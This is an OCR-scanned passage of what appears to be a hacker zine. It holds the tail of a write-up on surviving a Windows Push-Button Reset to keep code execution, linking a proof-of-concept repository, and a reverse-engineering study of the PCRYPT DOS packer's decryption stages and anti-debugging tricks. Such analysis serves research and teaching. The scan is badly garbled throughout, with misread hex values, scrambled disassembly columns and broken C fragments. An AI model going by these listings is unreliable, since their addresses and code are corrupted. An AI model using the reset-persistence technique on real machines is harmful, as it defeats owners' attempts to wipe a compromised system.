for the new account created. The payload testing phase was quite interesting, but to put it briefly, it is recommended 
avoiding anything non-command line based. Finally, all of this can actually be figured out by just looking at MSDN 
documentation regarding ResetConfig.xml and Push-Button Reset related information, which is what | initially 
started to do before working on the actual reversing process to understand particular undocumented things from 
this environment to interact better with the result recovered OS. The basic strategy was: “Poking around things until 
something particular interesting appears.” 


Conclusion: 


This was a brief writeup on how it is possible to survive and achieve code execution very easily if the reset is done 
through local installation, even when set “Remove files and clean the drive.” This took a while to reverse engineer 
since this environment, even if it looks similar to a usual Windows OS (both in kernel and user mode components), 
had quirks unique to this environment that required further research for my particular intentions. 


The link for the SDK header file for IDA and an incredibly bad programmed PoC is here: 
https://github.com/blackmassgroup/Black-Mass_v2 


Regarding other scenarios and limitations, it is important to keep in mind | mainly tested this both in a VM and ina 
usual Windows 10 home OS: Possible integrated mitigations were not taken in consideration (and are usually not set 
up in a default installation, even if it existed), but | am sure there is some policy to deal with it. On the other hand, 

| have NOT tested it in other scenario cases that could be used as well such as CloudResetScenario, which would 
match when the reset is done through a downloaded image. 


It is most likely that it would work as well in those cases, but for now, | leave it as an exercise to the reader. 
Present Day. Present Time. We are all connected 
This is probably my last public work in some months, but we will meet again soon in the future. 


Ukc4Z2JtOTBJR3hsZENCaGJubGIiMIl1 SUnSbGJHd2dlVzkxS UhSb1 lYUWdIVzkxSUdOaGJpZDBJR1J2SUdsMExn- 
bwpodHRwczovL3d3dy55b3VOdWJILmNvbS93YXRjaD92PTUKWTRZNDNXbVhj 


Special thanks to Jonas for the idea some months ago (although this was not precisely what | intended to achieve, 
but progress is progress). 

Additional references: 
0.-Main start reference: 


->https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/push-button-reset-over- 
view? view=windows-1 1 


1.-IDA Pro shifted pointers (particularly used for CString/CSimpleString containers). 
->Reference: https://hex-rays.com/blog/igors-tip-of-the-week-54-shifted-pointers/ 
->External header used: https://github.com/dblock/msiext/blob/master/externals/WinDDK/7600. 16385. 1/inc/atl71/ 


atlsimpstr.h 


2.-IDA Pro __cppobj structures (Used in most rebuilded classes). 
->Reference: https://www.hex-rays.com/products/ida/support/idadoc/1691.shtml 


3.-Autopilot processes (Good reference for OOBE binaries, did not added this for this paper): 
->https:/Avww.anoopcnair.com/windows-autopilot-in-depth-processes-part-3/ 


4.-WinPE additional information (Used some of them for debugging particular important components): 
->https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-vista/cc721977(v=ws. 10) 
->https://oofhours.com/2020/12/03/windows-pe-startup-revisited/ 

->UPDATE: It seems @gerhard_x was able to find a way to debug WinRE easier with LiveCloudKD 
https://twitter.com/gerhart_x/status/1614708016049278978/photo/1 


5.-Source for the image used for finding the different modules: 
https://answers.microsoft.com/en-us/windows/forum/all/after-running-wsresetexe-this-shows-up/53e9e1 68-0465- 
43f4-ba81-4fc77b0a871¢c 


Auaivon 


Decrypting PCRYPT: Self-Curing Insomnia 
Authored by gorplop@sof.org 
-section .greetz 


-asciz netspooky, everyone at vxug, 
and of course MERLIN themselves 


While going through various old tools | collected, | found a DOS COM file. | was curious on how it works, so | 
opened it in a disassembler. The file turned out to be an encrypted program, which decrypts itself in memory prior to 
execution. | decided to read through the assembly to find out what exactly it does. 


The program contained the following message that could be read when opening it in a hex editor: 


PCRYPT v3.44! Fast, cQ@Q@l Com&ExeCryptor 


UnPackable! :) 
U try 2 unPack iT! :) 


(C) MERLiN 1996-1997 


AVK BBS|Work Time: 23:00-07:00 
+7—XXX-XXX-XXXX 


On AvK bB$ U can |eVERYdAY! |get the 
1 9f PCRYPT! 


Latest Version 
Call & Enjoy! 


Origin: 


(BBS phone number redacted because it surely does not work anymore.) 


The utility was clearly protected from reverse engineering. | wanted to understand how it works, to rewrite it fora 
modern OS, so | started cracking the PCRYPT packer. I’ve noticed that the code contains parts that do not make 
sense at all, and parts that make sense but are riddled with decoy instructions that do not do anything. The code 
also looked handwritten. | decided to take the challenge posed by the author and try to recover the original code 
that was “encrypted”. 


| used radare2 to disassemble the code, and wrote my own C programs that emulate the subsequent stages of 
unpacking. This way, | could study the code contents as they were in memory after each stage was done. 


As you will see, the code employs many anti-RE tricks of the era that prevent dynamic analysis, or even simple 
debugging. In fact, running this COM file crashes my QEMU VM. Because of this, all of my work was done as fully 
static analysis. 


| chose the r2 disassembler because of it’s feature of starting disassembly from the current view position, which 

prevents it from being confused by the encrypted code. Ghidra and IDA are ok for this too if you manually mark 

what is code and what is not. All my work was done on disassembly. Decompilation is futile, as the code has not 
been generated by a compiler and the dummy instructions clutter up the resulting decompiled C code. There are 
little to no functions in the code too. 


PCRYPT was a utility that protected your code from debugging and reverse engineering. Here’s a posting from 
gHOST Station BBS file list that gives a list of features that PCRYPT v3.44 has: 


PCRYPT-encryptor of COM and EXE-files! 
* Works fast. 
* Small size. 
* Protects from debugging. 
* Written fully in assembly. 
Tested against the following programs: 
[... list of tools ...] 


Also causes failure under ALL debuggers that use int land int 3. Additionally PCRYPT 
will collide with debugers running in 386 mode, because from time to time it 
overwrites registers drQ - dr3. 


PCR344U.RAR 13400 23-08-97 +-----------------—- + PCRYPT v3.44 +- 
|PCRYPT-Wudposunk COM u EXE-odannos | 


| 
| 
| BbicTpo pabotaerT. 
| He6onbuionw pa3mep. 
| 3alyuTa OT OTNapkn. 
| w MonHoctbiw Ha AccemOnepe. 
| 
PCRYPT npoBepeH Ha CTOMKOCTb | 
co cnegywuwymMn nporpammamnu : | 
UUP v1.4; | 
TSUP v1.6; | 
UPC v1.03; | 
Intruder v1.20, v1.30; | 
CUP386 v3.0, v3.2, v3.3, v3.4 ;-)| 
XPACK —UX v1.49, v1.66-v1.67.k; | 
AutoHack v4.1, II v1.0, II v1.2; | 
TD386, | 
DosDebug; | 
Insight v1.01; | 
Axe-Hack v2.3; | 
Softice v2.80; | 
Meff 18-03-1996; | 
D(ALf) 1.0 Betta; | 
MegaDebugger v1.00; | 
AVPUTIL v1.0b, v2.1, v2.2; | 
DeGlucker v@.03, v@.03a, vQ@.@3b; | 
| 
| 
| 
| 
| 
| 
| 
| 
| 


fGeG: CC Cf GC Cf & Sete Gc Cc Cf CC peers 


| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| A Takxe He paObotaetT nog BCEMU 
| oTNagunkamn, ucnonb3yiwuumMu int 3 
| wn int 1. Takxe PCRYPT 6ymeT Me- 
| Watb pa6botatb oTnagyunkam, pabo- 
| TawuvmM B 386 pexume, T.K. OH 
| BPeMA OT BPeMeHM yHUNTOKAeT CO- 
| gepxkumoe oTNMaHOuHbIX perucTpoB 
| dr®@ - dr3. 


| 
| Copyright (c) 1996-1997 by MERLiN. 


| 
| Hatch by Michail A.Baikov (/1305) | 
Pr [ 20 Aug 1997 ]-+ 


There is an unpacker available for PCRYPT -- so the encryption scheme has been cracked. It is simple anyway. But | 
think it is really interesting to fully understand the encryption implementation, as well as the anti-reverse engineering 
tricks that were employed in the 386 era. As a side note, the same BBS lists release v3.45, that was published only 
12 days after the one used in this file... 


But let’s not get ahead of ourselves, and instead, dive into the binary. 


Stage //| 


The COM file starts with a jump to what | will call “Stage 1”. It’s listed on the next page. This is what you would see 
when you open it in a disassembler. 


0000:0100 e93705 jmp @x63a 


0000: 063a 7600 jnp 0x63c 

0000:063c 6685c9 test ecx, ecx 

0000: 063f 6a00 push @ 

0000: 0641 88d2 mov dl, dl 

0000: 0643 810a0000 or word [bp + sil, @ 
0000: 0647 e80000 call 0x64a 

0000: 064a 7500 jne @x64c 

0000: 064c 817a070000 cmp word [bp + si +7], @ 
Q000:0651 84c0 test al, al 

0000: 0653 665a pop edx 

Q000:0655 7900 jns 0x657 

0000: 0657 81c26000 add dx, 0x60 

0000: 065b Qf23c5 mov dr@, ebp 

0000: 065e 7d00 jge 0x660 

0000: 0660 2e670112 add word cs:[edx], dx 
0000:0664 89d2 mov dx, dx 

0000: 0666 2e6781020400 add word cs:[edx], 4 
0000: 066c 80f300 xor bl, 0 

0000: 066f 81330000 xor word [bp + di], @ 
0000: 0673 81c20400 add dx, 4 

Q000:0677 89c9 mov CX, CX 

0000:0679 2e678a0a mov cl, byte cs: [edx] 
0000: 067d 80e9b2 sub cl, @xb2 

0000: 0680 7900 jns 0x682 

0000: 0682 f6d1 not cl 

0000: 0684 80700d00 xor byte [bx + si + Oxd], 0 
0000: 0688 80cle2 add cl, @xe2 

0000: 068b 81830e4f0000 add word [bp + di + 0x4f0e], 0 
0000: 0691 56 push si 

0000:0692 5e pop si 

0000: 0693 808511fe00 add byte [di - @xlef], 0 
0000: 0698 7300 jae 0x69a 

Q000:069a 2e67880a mov byte cs:[edx], cl 
0000: 069e 6685c0 test eax, eax 

0000:06a1 84c0 test al, al 

0000: 06a3 7900 jns @x6a5 

0000: 06a5 42 inc dx 

0000: 06a6 7b00 jnp @x6a8 


0000: 06a8 81fa4603 cmp dx, 0x346 


0000: Q6ac 75c9 
0000: Q6ae 42 
0000: 06af 3d3c75 
Q000:06b2 8d29 
0000: 06b4 93 
0000:06b5 74ab 


jne @x677 


inc dx 

cmp ax, @x753c 
lea bp, [bx + di] 
xchg ax, bx 

je 0x662 


You can notice that it contains some instructions which are valid, but do not change the execution of the program at 
all. For example, the numerous jump instructions, with random condition codes, that jump to the next instruction (So 
the program flow does not change whether the jump was to be taken or not). Other examples of these decoys are 
the multiple mov instructions that move a register to itself or various xor instructions that XOR some location with 
zero and others. These instructions are there just to confuse decompilers. 


Next is the stage 1 disassembled with all the decoy instructions removed. Let’s analyze how it works. 


With decoy insns removed: 


13 CS = 
;; DS = 0000 
5; ES = 0000 
+; SS = 0000 
0000:063a 7b00 
7; start decryptor 
0000: 063f 6a00 
Q000:0647 e80000 
0000:0653 665a 
Q000:0657 81c26000 
Q000:065b @f23c5 
(1) 0000:0660 2e670112 
0000:0666 2€6781020400 
0000:0673 81c20400 
—> Q000:0677 89c9 
: 0000:0679 2e678a0a 
0000:067d 80e9b2 
0000:0682 f6d1 
0000:0688 80cle2 
0000:0691 56 
0000:0692 5e 
0000:069a 2e67880a 
0000:06a5 42 
0000:06a8 81fa4603 
: Q6aa 4603 
-< 0000:06ac 75c9 
(2) 0000:06ae 42 
0000: 06af 3d3c75 
0000:06b5 74ab 


0000 for what we care (points at program) 


jnp @x63c 


push @ 
call @x64a 


edx 

dx, @x60 

dr@, ebp 

word cs:[edx], dx 


pop 
add 
mov 
add 


word cs:[edx], 4 


byte cs: [edx] 


sub cl, @xb2 
not cl 
add cl, 
push si 
pop si 
mov byte cs:[edx], cl 
inc dx 

cmp dx, 0x346 


Q@xe2 


jne Qx677 
inc dx 
cmp ax, 
je 0x662 


@x753c 


TOS 
stack = 00 00 
stack = a4 06 00 00 


stack = empty; edx = 0000 064a 
dx = 0x64a+0x60 = Ox6aa 
Write bp to breakpoint @ 
cs:edx = 0000:06aa, this 
changes the comparison value 
at @6a8 to Oade 

Move dx pointer to start of 
encrypted code and change 
the comparison value 
(functional NOP) 

Load encrypted byte -> cl 

in the first iteration dx 
points to (2), where the 
‘encrypted’ code starts 


Mangle cl 
Trigger breakpoint if any 


Write back 

Go to next byte 

—> becomes cmp dx, QaQe, 

then cmp dx, Qal12 

Jump back up 

“ENCRYPTED” CODE STARTS HERE 

Mm Ww Mm 8 MM DC Jas 
Xx WX %X X XR X X 


Stage 2: 868 demangled bytes 


When the DOS kernel loads a COM executable, it does so into offset 0x0100 in some code segment cs. The cs, ss, 
ds, and es segment registers are set to the segment that the COM is loaded. For the sake of our analysis, we can 


assume that these segments are zero. In most DOS versions si and di are set to 0x0100, but the cs is unknown. 
Analyzing real mode code that uses segments is a difficult task to take up with modern disassembly tools. | found 
that neither radare2 nor ghidra knows how to deal with this correctly. Later in stage 3, the code will do some tricks 
related to the IVT which is physically located in segment 0000. This should not be confused with the 0000 segment 
that appears on the disassembly listings. | will try to make it clear. Segmented memory was truly a dark time in x86 
programming. 


The code above demangles 868 bytes starting at OxO06ae. It uses a clever trick to hide the amount of bytes and the 
address that it starts demangling at. The code is riddled with decoy instructions that do not do anything. It also 
accesses 32-bit registers in 16-bit mode using the 0x66 and 0x67 operand size and address size prefixes. Let’s go 
through the code instruction by instruction: 


0000: 063f 6a00 push @ 
0000: 0647 e€80000 call 0x64a 


The call instruction is used to push the current instruction address to the stack and the preceding push 0 is used to 
prefix the value with Ox0000. A call to relative address +0 allows for writing PIC (position independent code) as gives 
you the current ip. It also is a decoy instruction, as it transfers the execution to the instruction immediately after. 


0000:064a 7500 jne @x64c 
One of the decoy instructions. No matter if the jump is taken or not, the execution continues at the next instruction 


0000:0653 665a pop edx 
0000:0655 7900 jns Qx657 


This loads edx with the value 0000 064a from stack. Now dx contains a pointer to the call instruction. The add in- 
struction moves the pointer forward to Ox6aa. 


0000: 065b @f23c5 mov drQ@, ebp 


drO through dr3 contain 4 hardware breakpoints for the CPU. This instruction overwrites the first breakpoint with the 
current ebp value. By default breakpoints only trigger when the addess matches on instruction execution. This is 
controlled by the RWn field in debug register dr7. If the program is running inside a debugger (or more correct, for 
DOS, if a debugger is running) then the debugger might have changed the RW0O field to trigger the breakpoint on 
memory access (write or read/write). This, in conjuction with the push si, pop si pair would cause a memory write at 
ebp (the stack is empty at this point) and trigger the breakpoint and confuse the debugger (likely unaware that it’s 
breakpoint was changed). The push/pop pair is inside the demangler loop which makes it likely that someone who 
wants to debug this program would set a memory breakpoint here. 


If a debugger is not running, this booby trap has no effect because the default for breakpoints is to trigger on 
instruction execution. 


0000: 0660 2e670112 add word cs:[edx], dx ; cs:edx = 0000:Q06aa 


This instruction adds the value of dx to the address at dx - it falls in the middle of the compare instruction (at 06a8), 
effectively changing the immediate operand of the compare to Oa0e. 


0000: 0660 2e670112 add word cs:[edx], dx 
0000:0666 2e6781020400 add word cs:[edx], 4 


The first add instruction increases the immediate operand by 4. The second add changes the value in dx accordingly 
which moves cs:edx to Ox6ae. That address is immediately after the jne 0x677, which ends the loop. It’s where the 
‘encrypted’ code starts. 


0000:0679 2e678a0a mov cl, byte cs:[edx] ; Load encrypted byte —> cl 


0000: 067d 80e9b2 sub cl, @xb2 ; 

0000: 0682 f6d1 not cl ; Mangle cl 
0000: 0688 80c1e2 add cl, Oxe2 ; 

0000:069a 2€67880a mov byte cs:[edx], cl ; Write back 
0000: 06a5 42 inc dx 


The main loop consists of 6 instructions that load a single byte from the ‘encrypted’ code, demangle it and write it 
back, then increase dx so that cs:edx points at the next byte to be processed. 


0000: 06a8 81fa4603 cmp dx, 0x346 
0000: 06ac 75c9 jne Qx677 


A compare and jump instrucion ends the loop. Note that the comparison immediate operand will be different by the 
time it gets executed first because it was changed by the add at 660 and 666. The loop ends “Stage 1” of this 
encryptor. When dx == 0x0a12, the code following the loop will be fully demangled and the CPU will start executing 
it. 


Now that we know the basic operations that stage1 performs, we can make a program that demangles the code. 


/* The usual boilerplate code is omitted. The input file (raw COM 
into a unit8_t array (me 


done 


#define ST2_LEN 868 

#define BUFSZ 4096 

int main(char argc, char*x 
t memory [BUFSZ] ; 


//usual stuff, open file, load into memory array 


//Decode ST2_LEN b s from input file starting at memory offset @x6ae 
OM file offset Ox5ae 


count = Q; 
while(count < ST2_LEN 
uint8_t b = memory[count + ST2_OFFS]; 
b -= @xb2; 
b = ~b; 
b += @xe2; 
memory{count + ST2_OFFS] 
count++; 


//Save memory to a new file, the usual stuff. 


After we compile this program and run it on the com file, it will produce another binary which reflects the 

memory contents as they were just after the loop ends the stage 1 payload starts at Ox6ae and ends at Oxa12. We 
can open the resulting file in a disassembler and seek to Ox6ae. Note that the COM is loaded at an offset of 0x100, 
so we need to load our file to the disassembler at the same offset. In r2, you can pass a second argument to the 
open command like this: 


[0000:0000]> 0 past_stagel.bin 0x100 


Now we can analyze the descrambled code of stage 2. 


Stage 2 starts at Ox6ae. In our analysis, we need to consider the register file contents at the end of stage 1. We can 
find them by quickly skimming through stage 1 code: 


5; dx = @al12 
7; Gi = 0x100 ds = 0x100 si = 0x100 es = 0x100 ch = ?? cl = decrypted byte 


Here is the full stage 2 disassembly: 


0000:06ae 51 push cx 

0000: 06af 56 push si 

0000: 06b0 57 push di 

0000: 06b1 le push ds 

0000: 06b2 06 push es 

0000: 06b3 6a00 push @ 

0000: 06b5 1f pop ds 

0000: 06b6 e80000 call Qx6b9 
0000: 06b9 58 pop ax 
0000:06ba @55500 add ax, @x55 
0000: 06bd a30400 mov word [4], ax 
0000: 06c0 8c0e0600 mov word [6], cs 
0000: 06c4 Ge push cs 
0000:06c5 1f pop ds 

0000: 06c6 Ge push cs 

0000: 06c7 Q7 pop es 

0000: 06c8 9c pushf 

0000: 06c9 58 pop ax 
0000:06ca 80cc01 or ah, 1 
0000: 06cd 50 push ax 

0000: 06ce 9d popf 

0000: 06cf e80000 call Qx6d2 
0000: 06d2 5e pop si 

0000: 06d3 83c667 add si, 0x67 
0000: 06d6 90 nop 

Q000:06d7 8bde mov bx, si 
0000: 06d9 53 push bx 

0000: 06da e€80000 call Qx6dd 
0000: 06dd 5a pop dx 

0000: 06de 81c21703 add dx, 0x317 
0000: 06e2 8bda mov bx, dx 
Q000:06e4 81c3ee01 add bx, Qx1lee 
0000: 06e8 ae cld 

Q000:06e9 8bfe mov di, si 
0000: 06eb b9bbO2 mov cx, @x2bb 


Q000:06ee 33c0 xor ax, ax 


—> 0000: 06f0 
0000: 06f1 
0000: 06f3 

0000:0725 
0000: 0726 
0000: 0728 


“,--< 0000:072a 
: 0000:072c 
‘ 0000:072e 
a 0000:0732 
“'--> 0000:0734 
0000: 0736 
0000:0737 
0000: 0738 


0000: 06f6 
0000: 06f8 
-< 0000:06f9 


0000: 06d3 
0000: 06d4 
0000: 06d5 
0000: 06d6 
0000: 06d7 
0000: 06d8 
0000: 06d9 
0000: 06dc 
0000: 06de 
0000: O6df 
0000: 206e0 
Q000:06e1 
0000: 06e3 
0000: 06e5 


8leeeeQ1 
8bd6 
3204 


42 


5e 
c3 


8cc8 


lodsb al, byte [sil] 
xor al, ah 
call @x725 

push si 

mov si, dx 

cmp si, bx 


jne @x734 
mov si, bx 
sub si, @xlee 
mov dx, si 

xor al, byte [sil] 


inc dx 
pop si 
ret 


inc ah 


stosb byte es: [di], al 


loop @x6f® 


pop bx 

pop es 

pop ds 

pop di 

pop si 

pop cx 

add bx, 0x10 
mov ax, CS 
dec ax 
push ax 
push bx 
xor bx, bx 
xor ax, ax 
retf 


Stage 2 prelude starts with some heavy stack operations. We have to keep track of the stack to have a clear view of 
the register file at the end of this stage. I’ve commented the listing with the stack contents and the stack depth: 


0000: 06ae 
0000: 06aT 
0000: 06b0 
0000: 06b1 
0000: 06b2 
0000: 06b3 


push si ; 00 
push di ; 00 
push ds ; 00 
push es ; 00 
push @ ; 00 


push cx ; ?? 


; <--stack-— (amount of words pushed) 


XX (1) 

01 ?? xx = (2) 

Q@1 Q@ Q1 ?? xx (3) 

Q@1 OQ @1 OO O1 ?? xx (4) 

Q1 OQ Q1 OO Q1 OO O1 ?? xx (5) 
QQ 08 O01 OG O1 BO O01 OO O1 ?? xx 


This last instruction was quite problematic for me. It is encoded as 6a 00, which is ‘push imm® instruction. | 
checked it precisely and | have to criticize the Intel Software Developers Manual. This instruction is called “Push 
immediate byte”, and you would think that this is what it does. That’s wrong - 386/x86 has no single byte stack 
operations. Instead, what this does, it sign-extends the byte to a word and then pushes that. This operation is also 
not clearly documented in the pseudocode section for PUSH instruction, as there is no case listed for when operand 
size is 8. If we assumed that this pushes a single byte, then the stack contents do not make sense at the end of this 


stage. 


0000: 06b5 
0000: 06b6 
0000: 06b9 


1f 
e80000 
58 


pop ds 
call @x6b9 
pop ax 


we we we we 


ds = 0000 

b9 06 80 01 Q@ 01 OO O1 OO O1 ?? xx 
ax = 6b9 

stack = 00 01 00 01 00 01 00 01 ?? xx 


0000: 06ba @55500 add ax, @x55 7; ax = 70e 


0000: 06bd a30400 mov word [4], ax ; Debug interrupt takeover 
Q000:06c0 8c0e0600 mov word [6], cs ; 
0000: 06c4 Qe push cs ; Q@ O01 OO O1 Q@ O1 OO O1 OO O1 ?? xx 
0000:06c5 1f pop ds ; ds = 100 ds := cs 
0000: 06c6 Oe push cs ; Q@ O01 OO O01 Q@ O1 OO O1 OO O1 ?? xx 
Q000:06c7 Q7 pop es 7 es = 100 es := cs 

; stack = Q@ 01 00 01 00 Q1 00 O1 ?? xx 


Here we can see the “call next instruction” trick again, which lets us save the instruction pointer to the stack. | will 
come back to the two mov instructions in a moment. Let’s continue our analysis noting down that the last 4 
instructions here set ds and es to the code segment value. 


0000: 06c8 9c pushf ; 
0000: 06c9 58 pop ax ; ax = flags 
0000:06ca 80cc01 or ah, 1 ; flags.TF = 1 
0000:06cd 50 push ax ; The code here sets the trap flag —- 
; int3 is generated after every instr. 
Q000:06ce 9d popf ; Commit flags 


The above code fragment sets the trap flag, which will cause an interrupt (int3) to be generated after the next 
instruction (call below).No int3 handler was registered and the default DOS one does nothing. Interrupt 3 is the 
debug interrupt (different than Interrupt 1, which was redefined before), so this would cause the program to drop out 
to a debugger if it was run inside one. Setting the trap flag will cause the debugger handler to be invoked after every 
instruction, which makes debugging harder because the program starts to single step (until you realize it and unset 
the TF). It bumps up the skill level necesary to crack this program with dynamic analysis. 


0000: 06cf €80000 call O0x6d2 ; d2 06 00 01 00 Q1 00 O1 OO Q1 ?? xx 
0000: 06d2 5e pop si 7; Si = 6d2 

; stack = Q@ 01 00 01 00 Q1 QQ 01 ?? xx 
0000: 06d3 83c667 add si, @x67 =; Si = Qx739 


We see the call-pop-add sequence again, this time to save the current instruction pointer to the si register, then 
adjust it by a constant. As we will see in a moment, this constant is the distance between the current ip and the end 
of decryption code, so that it points just after the stage 2 demangler, where encrypted stage 3 code resides. 


Now the code proceeds to the main stage 2 code. I’ve commented the listing and will go through it in detail: 
+3. Si = Qx739 


;; ds, es segment registers are loaded with the segment COM is resident at (cs) 
77 stack = 00 01 00 01 00 01 OO O1 ?? xx 


;-- stage2: 

Q000:06d6 90 nop 

0000: 06d7 8bde mov bx, Si ; bx = 739; 

0000: 06d9 53 push bx ; 39 07 Q@ 01 QQ O1 OO O1 OO O1 ?? xx 
Q000:06da e80000 call @x6dd ; dd 06 39 07 00 01 00 O1 OO O1 BQ... 
0000: 06dd 5a pop dx ; dx = 6dd; 

Q000:06de 81c21703 add dx, 0x317 ; dx = 9f4 

0000: 06e2 8bda mov bx, dx ; bx = 9f4 

0000: 06e4 81c3ee01 add bx, @xlee ; bx = be2 

Q000:06e8 fc cld ; Clear dir flag 

0000: 06e9 8bfe mov di, si ; di <- si; di=0@x739 

Q000:06eb b9bbe2 mov cx, @x2bb ; CX = 2bb 


0000: 06ee 33c0 xor ax, ax ax = 0; al = 00 ah = 00 


The above snippet does some final preparations for the decryption loop. We have some more call-pop-add se- 
quences to load the dx register with another pointer to what will be one of the keys for the algorithm. cx is loaded 
with a constant value that will be used to count the iterations of the algorithm. 


Notice the nop instruction at the start of this snippet. | have a feeling the author needed to pad the code by just one 
byte? | think there might be some room for improvement here :) 


Anyway, off to the decryption code. The registers at the beginning are as follows, with 
their functions described: 


;; Regs at start: al=0; ah=0; dx=9f4; bx=be2; si=@x739; di=@x739; cx=2bb; 
;; al — payload byte 

;; ah - rolling key (incremented each byte) 

;; Si and di — target r & w pointers 

7; Ox — key2 pointer 

3 bx - constant value of @xbe2 (not written) 

+; CX — loop counter for loop insn 


;; Main demangle loop: al is the byte operated on. This is a dual XOR routine 
;; First XOR key is sequential from Q. 
;; Second XOR key takes the bytes between 9cc and bba. 


—> 0000: 06f0 ac lodsb al, byte [si] ; al = payload byte; si++ 

: 0000: 06f1 32c4 xor al, ah ; Xor with ah 

i 0000: 06f3 e82F00 call Q@x725 ; Call the stage 2 demangle func. 
: ;;7 St2 demangle function 

Q000:0725 56 push si ; Save si 

: 0000:0726 8bf2 mov si, dx ; Si <- dx 

: 0000:0728 3bf3 cmp si, bx ; bx =? dx; dx =? @xbe2 

: +; This clause will set dx to @x9f4 if dx == bx (dx == Q@xbe2) 

‘ .-< 0000:072a 7508 jne 0x734 

wos ; This executes if si == bx. 
are Q000:072c 8bf3 mov si, bx ; Sl <- Qxbe2 

eos 0000:072e 8leeeeQ1 sub si, @xlee ; Si <- QOxbe2 - @xlee = Ox9f4 
eos 0000:0732 8bd6 mov dx, si ; dx <- si, dx = Ox9f4 

‘ *-> Q000:0734 3204 xor al, byte [si] ; key2 xor; al *= x*(dx) 

: Q000:0736 42 inc dx 

‘ 0000:0737 5e pop si 

0000:0738 c3 ret 

: 0000:06T6 fec4 inc ah ; Increase key 

: 0000:06f8 aa stosb byte es:[di], al ; Store decrypted byte 

‘—< Q000:06f9 e2f5 loop @x6fd ; jmp @x6f® if cx—- != 0 


This is a long snippet but it forms a logical block. Let’s run it down instruction by instruction: 


0000: 06fO ac lodsb al, byte [si] ; al = ciphertext; si++ 
0000:06f1 32c4 xor al, ah 


First we load a byte from the address in si to the register al. This is our ciphertext byte. si is automatically increment- 
ed by the lodsb instruction. Then we xor it with ah. (al <= al xor ah) 


0000: 06f3 e82f00 call Qx725 ; Call the stage 2 demangle function 


A call to a subroutine (function) is made. Let’s break the function down: 


Q000:0725 56 push si ; Save si 
0000:0726 8bf2 mov si, dx ; Si <- dx 


We save si on the stack, then copy dx into it. 


0000:0728 3bf3 cmp si, bx ; bx =? dx; dx =? Qxbe2 
0000:072a 7508 jne 0x734 

;; This executes if si == bx. 

Q000:072c 8bf3 mov si, bx ; Si <- Qxbe2 

Q000:072e 81leeeeO1 sub si, Oxlee ; Si <- Q@xbe2 —- Oxlee = Ox9f4 
0000:0732 8bd6 mov dx, si ; dx <- si, dx = Ox9f4 


Compare the dx value (which is now in si) with bx. bx is a constant of Oxbe2 (it is not written to in the entire loop). 
If the values are equal, the jne is not taken and the dx is rolled back to Ox9f4, it’s original value set at Ox6e2. If the 
jump is taken the execution skips to 0x734: 


0000: 0734 3204 xor al, byte [si] ; key2 xor; al *= *(dx) 
0000:0736 42 inc dx 

0000:0737 5e pop si 

0000:0738 c3 ret 


Now out ciphertext byte is xored again, this time with a byte pointed to by si. si still contains the dx value (in either 
case of the jump). Then dx is incremented, si is restored by the pop instruction to it’s previous value and the subrou- 
tine ends jumping back to Ox6f6: 


0000:06T6 fec4 inc ah ; Increase key2 
ah, which contains the rolling key value, is incremented 
0000: 06f8 aa stosb byte es:[di], al ;; dit+ 


The processed ciphertext byte (which is now cleartext), is stored in es:di, then di is incremented (stosb is a string 
operation which does all this in one instruction) 


0000: 06f9 e2f5 loop @x6fd ; jmp @x6f@ if cx-—- != 0 
The loop instruction decrements cx and if its not zero the code jumps back to Ox6f0 to process the next ciphertext 
byte. Notice that the si and di values at the start are identical, so the code overwrites the ciphertext with the cleart- 


ext (it decrypts it in place). 


This function can be expressed in C like this: 


rR 


uint16_t si = 0x739; 
uint16_t di = @x739; 
uint8_t key = @; 

uint16_t key2 = 0x9f4; 
uint16_t cx = @x2bb; 
uint8_t x; 

const uint16_t bx = @xbe2; 


SN OU bh W NN 


wo co 


do 


rR 
S 


memory[sil; si++; 
x * key; 


PRR 
WNP 


if(bx == key2){ 
key2 = bx —- Oxilee; 
} 


PrPRrPPR 
NOUS 


x = x * memory ([key2]; 
key2++; 
key++; 
memory[di] = x; di++; 
Cx--; 

while (cx != @); 


After the function is done, the code will prepare the registers for stage 3. Note that the stack is preserved by the 
decryption loop. 


0000: 06d3 5b pop bx ; bx = 739; stack = 00 01 00 01 00 01... 
0000:06d4 Q7 pop es ; eS = 0100; stack = 00 01 00 01 00 O01... 
0000: 06d5 1f pop ds ; ds = 0100; stack = 00 Q1 00 01 ?? xx 
0000: 06d6 5f pop di ; di = 0100; stack = Q@ 01 ?? xx 
Q000:06d7 5e pop si ; Si = 0100; stack = ?? xx 

0000: 06d8 59 pop cx 7; CX = ??xx; stack = <empty> 


These pop instructions are exactly in reverse order as the series of pushes at Ox6ae, except for the first instruction 
(pop bx). They 

restore the segment values, di, si and cx registers to their values before stage 2. However the first instruction pops 
what was the pointer to the encrypted/decrypted code into bx, so now bx contains the pointer to stage 3 code. 


0000: 06d9 83c310 add bx, 0x10 ; bx = @x749 
Q000:06dc 8cc8 mov ax, CS 5 ax = @x100 (cs not written to so far) 
Q000:06de 48 dec ax 5 ax = OxOff 


The next part is a clever trick to further confuse the hacker who wants to analyze this code. First, a constant of 0x10 
is added to bx (which points to the stage 3 code). Then cs is copied to ax, and ax is decremented by 1. 


0000: 06df 50 push ax ; stack = ff 00 

0000: 06e0 53 push bx ; stack = 49 07 ff 00 

Q000:06e1 33db xor bx, bx ; bx = 0 

0000: 06e3 33c0 xor ax, ax ; ax = O 

0000: 06e5 cb retf ; Pull address from stack and return, 


; go to stage 3 entry point 


Here the trick happens: ax and bx are pushed onto the stack, then they are zeroed and a far return is executed. The 


far return is different from a near return in that it also pulls the new code segment value from stack. This will cause 
the code to do a long jump (intersegment jump) to ax:bx. But just a moment ago, these values were changed in a 
specific way. The segment was decremented, and 0x10 was added to the offset. 


In practice the actual return address did not change. The offset and segment values were changed in a way that the 
segment:offset value still points to the same place - this is because how the x86’s segmented memory model works. 


In segmented memory model (real mode), the linear address is calculated by shifting the segment address by 4 bits 
to the left, and adding it to the offset. This means that increasing the offset by 0x10 (decimal 16) and decrementing 
the segment are opposite 

operations and the result is unchanged. See the example below: 


Ox OOff segment shifted << 4 
+ Ox 0749 offset 


Q@x 01739 logical/linear memory address 
But this address also maps to 0100:0739: 


Ox 0100 
+ @x 0739 


@x 01739 


The entry point to stage 3 is at OOff:0749 (or 0100:0739). But before look there, let’s come back to the two mov 
instructions at 6bd and 6c0, that we skipped, and the code before them. They move two registers into addresses 4 
and 6 in the data segment. 


